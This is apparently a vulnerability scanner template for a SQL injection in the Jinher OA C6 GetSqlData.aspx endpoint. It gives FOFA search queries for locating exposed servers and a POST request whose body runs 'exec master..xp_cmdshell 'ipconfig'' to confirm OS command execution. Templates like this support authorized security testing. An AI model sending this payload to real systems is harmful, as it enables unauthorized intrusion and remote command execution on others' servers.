漏洞描述
FOFA: app="金和网络-金和OA"
FOFA: body="src=\"/c6/WebResource.axd"
id: jinher-c6-getsqldata-sqli
info:
name: 金和 OA C6-GetSqlData.aspx SQL注入
author: zan8in
severity: high
description: |
FOFA: app="金和网络-金和OA"
FOFA: body="src=\"/c6/WebResource.axd"
tags: jinher,sqli
created: 2023/09/03
rules:
r0:
request:
method: POST
path: /C6/Control/GetSqlData.aspx/.ashx
headers:
Content-Type: text/plain
body: |
exec master..xp_cmdshell 'ipconfig'
expression: response.status == 200 && response.body.bcontains(b'Windows IP')
expression: r0()